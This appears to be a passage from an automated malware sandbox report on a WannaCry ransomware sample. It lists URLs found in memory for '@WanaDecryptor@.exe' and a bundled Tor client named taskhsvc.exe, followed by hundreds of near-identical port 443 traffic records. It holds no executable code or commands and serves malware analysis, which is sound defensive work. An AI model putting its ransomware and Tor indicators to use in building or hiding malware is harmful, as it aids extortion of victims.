              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/sessions-694c8423e347.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/ui_packages_commit-attribution_index_ts-ui_packages_commit-ch
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/ui_packages_failbot_failbot_ts-5bd9ba639cc0.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/ui_packages_paths_index_ts-ea3e1b2a33c6.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/ui_packages_react-core_register-app_ts-3208e4c5b7c1.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/ui_packages_ref-selector_RefSelector_tsx-dbbdef4348e2.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_color-convert_index_js-72c9fbde5ad4.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-6890e890956f.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_catalyst_lib_index_js-node_module
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_combobox-nav_dist_index_js-node_m
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_file-attachment-element_dist_inde
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_filter-input-element_dist_index_j
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_paste-markdown_dist_index_esm_js-
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_relative-time-element_dist_index_
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_selector-observer_dist_index_esm_
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_text-expander-element_dist_index_
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-c9
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_lit-html_lit-html_js-5b376145beff.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-5bff297a06
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_dimensions_js-
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_behaviors_dist_esm_focus-zone_js-
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_octicons-react_dist_index_esm_js-
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionMenu_ActionMe
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Avatar_Avatar_js-no
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Box_Box_js-8f8c5e2a
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_Button_js-d5
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Button_IconButton_j
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ConfirmationDialog_
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Dialog_js-node_modu
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_FormControl_FormCon
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Overlay_Overlay_js-
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_PageLayout_PageLayo
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_Text_Text_js-node_m
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_TreeView_TreeView_j
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_react-router-dom_dist_index_js-3b41341d5
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/vendors-node_modules_stacktrace-parser_dist_stack-trace-parse
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/assets/wp-runtime-5afb085e74be.js
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/favicons/favicon.png
              Source: chromecache_814.1.drString found in binary or memory: https://github.githubassets.com/favicons/favicon.svg
              Source: chromecache_814.1.drString found in binary or memory: https://partner.github.com/
              Source: chromecache_814.1.drString found in binary or memory: https://resources.github.com/
              Source: chromecache_814.1.drString found in binary or memory: https://resources.github.com/devops/fundamentals/devsecops/
              Source: chromecache_814.1.drString found in binary or memory: https://resources.github.com/learn/pathways/
              Source: taskhsvc.exe, 00000069.00000003.1618263707.0000000004000000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000069.00000003.1645310857.0000000003DE7000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000069.00000003.1627606704.0000000004294000.00000004.00000020.00020000.00000000.sdmp, taskhsvc.exe, 00000069.00000003.1615249805.0000000003EAF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sabotage.net
              Source: chromecache_814.1.drString found in binary or memory: https://skills.github.com/
              Source: chromecache_814.1.drString found in binary or memory: https://support.github.com?tags=dotcom-footer
              Source: taskhsvc.exe, 00000069.00000000.1544087986.000000000042C000.00000002.00000001.01000000.0000000B.sdmp, taskhsvc.exe.69.drString found in binary or memory: https://trac.torproject.org/8742
              Source: taskhsvc.exe, 00000069.00000000.1544087986.000000000042C000.00000002.00000001.01000000.0000000B.sdmp, taskhsvc.exe.69.drString found in binary or memory: https://trac.torproject.org/projects/tor/ticket/14917.
              Source: chromecache_814.1.drString found in binary or memory: https://user-images.githubusercontent.com/
              Source: taskhsvc.exe, 00000069.00000000.1544087986.000000000042C000.00000002.00000001.01000000.0000000B.sdmp, taskhsvc.exe.69.drString found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%s
              Source: taskhsvc.exe, 00000069.00000000.1544087986.000000000042C000.00000002.00000001.01000000.0000000B.sdmp, taskhsvc.exe.69.drString found in binary or memory: https://wiki.torproject.org/TheOnionRouter/TorFAQ#SOCKSAndDNS.%sDANGEROUS_SOCKS
              Source: chromecache_814.1.drString found in binary or memory: https://www.githubstatus.com/
              Source: ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1426542169.000000000098A000.00000004.00000020.00020000.00000000.sdmp, ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe, 0000000B.00000003.1423162894.0000000000989000.00000004.00000020.00020000.00000000.sdmp, @WanaDecryptor@.exe, 00000045.00000000.1517699744.000000000041F000.00000008.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000004B.00000002.1530960305.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000050.00000002.1524452290.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000052.00000002.1525784125.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000053.00000002.1526743183.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000056.00000002.1528095321.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000058.00000002.1529684373.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005A.00000002.1530691676.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005E.00000002.1531940210.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000005F.00000002.1533260086.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000061.00000002.1534786645.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000062.00000002.1536847189.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000064.00000002.1537704878.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000065.00000002.1539090441.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000067.00000002.1540280888.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 00000068.00000002.1541702331.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000006B.00000002.1543186279.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000006D.00000002.1544404210.0000000000421000.00000004.00000001.01000000.00000009.sdmp, @WanaDecryptor@.exe, 0000006F.00000002.1545763104.0000000000421000.00000004.00000001.01000000.00000009.sdmpString found in binary or memory: https://www.google.com/search?q=how
              Source: taskhsvc.exe, 00000069.00000000.1544087986.000000000042C000.00000002.00000001.01000000.0000000B.sdmp, taskhsvc.exe.69.drString found in binary or memory: https://www.torproject.org/
              Source: taskhsvc.exe, 00000069.00000000.1544087986.000000000042C000.00000002.00000001.01000000.0000000B.sdmp, taskhsvc.exe.69.drString found in binary or memory: https://www.torproject.org/docs/faq.html#BestOSForRelay
              Source: taskhsvc.exe.69.drString found in binary or memory: https://www.torproject.org/documentation.html
              Source: taskhsvc.exe, 00000069.00000000.1544087986.000000000042C000.00000002.00000001.01000000.0000000B.sdmp, taskhsvc.exe.69.drString found in binary or memory: https://www.torproject.org/download/download#warning
              Source: taskhsvc.exe, 00000069.00000000.1544087986.000000000042C000.00000002.00000001.01000000.0000000B.sdmp, taskhsvc.exe.69.drString found in binary or memory: https://www.torproject.org/download/download#warningalphabetaThis
              Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49875 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
              Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
              Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
